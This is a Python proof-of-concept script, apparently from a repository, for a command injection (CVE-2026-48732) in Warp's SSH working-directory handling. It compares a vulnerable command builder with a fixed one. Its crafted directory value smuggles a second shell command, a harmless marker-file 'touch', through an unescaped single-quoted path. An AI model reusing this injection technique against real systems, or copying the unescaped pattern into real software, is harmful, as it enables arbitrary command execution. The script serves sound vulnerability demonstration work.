README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2026-48732 Proof of Concept.
This script safely reproduces the vulnerable shell command construction pattern
from Warp's legacy SSH background command path. It runs only against the local
shell and uses a marker file to demonstrate whether command injection occurred.
"""
from __future__ import annotations
import argparse
from pathlib import Path
import shlex
import subprocess
import sys
import tempfile
DEFAULT_MARKER = "/tmp/warp_cve_2026_48732_confirmed"
def shell_escape_single_quotes_for_posix(value: str) -> str:
"""Escape embedded single quotes for a surrounding POSIX single-quoted arg."""
return value.replace("'", "'\"'\"'")
def build_vulnerable_command(current_directory_path: str, command: str) -> str:
"""
Reproduce the vulnerable command pattern:
cd '{current_directory_path}' && <command>
Embedded single quotes are not escaped, so shell syntax can break out.
"""
return f"cd '{current_directory_path}' && {command}"
def build_fixed_command(current_directory_path: str, command: str) -> str:
escaped_path = shell_escape_single_quotes_for_posix(current_directory_path)
return f"cd '{escaped_path}' && {command}"
def remove_marker(marker: Path) -> None:
try:
marker.unlink()
except FileNotFoundError:
pass
def run_shell(command: str) -> subprocess.CompletedProcess[str]:
return subprocess.run(
["/bin/sh", "-c", command],
check=False,
text=True,
capture_output=True,
)
def parse_args() -> argparse.Namespace:
parser = argparse.ArgumentParser(
description="Local PoC for CVE-2026-48732 Warp SSH cwd command injection."
)
parser.add_argument(
"--mode",
choices=("vulnerable", "fixed"),
default="vulnerable",
help="Run the vulnerable or fixed command builder.",
)
parser.add_argument(
"--marker",
default=DEFAULT_MARKER,
help=f"Marker file created by the payload. Default: {DEFAULT_MARKER}",
)
parser.add_argument(
"--keep-existing-marker",
action="store_true",
help="Do not remove an existing marker before running.",
)
return parser.parse_args()
def main() -> int:
args = parse_args()
marker = Path(args.marker)
if not marker.is_absolute():
print("[-] Marker must be an absolute path.", file=sys.stderr)
return 2
if not args.keep_existing_marker:
remove_marker(marker)
with tempfile.TemporaryDirectory(prefix="warp-cve-2026-48732-") as safe_dir:
base_dir = Path(safe_dir)
# The attacker-controlled cwd closes the single-quoted cd argument,
# appends a harmless marker creation command, then reopens a quote.
malicious_cwd = (
f"{base_dir}'; touch {shlex.quote(str(marker))}; echo '"
)
if args.mode == "fixed":
full_command = build_fixed_command(malicious_cwd, "pwd")
else:
full_command = build_vulnerable_command(malicious_cwd, "pwd")
print(f"[*] Mode: {args.mode}")
print("[*] Attacker-controlled remote cwd:")
print(f" {malicious_cwd}")
print("[*] Generated helper command:")
print(f" {full_command}")
print("[*] Executing generated command locally via /bin/sh...")
result = run_shell(full_command)
if result.stdout:
print("[*] stdout:")
print(result.stdout.rstrip())
if result.stderr:
print("[*] stderr:")
print(result.stderr.rstrip())
print(f"[*] Exit code: {result.returncode}")
if marker.exists():
print(f"[!] SUCCESS: {marker} was created.")
print("[!] Command injection behavior confirmed in the local simulation.")
return 0
if args.mode == "fixed":
print(f"[+] OK: {marker} was not created.")
print("[+] Escaping prevented the injected shell syntax from executing.")
return 0
print(f"[-] Failure: {marker} was not created.")
return 1
if __name__ == "__main__":
raise SystemExit(main())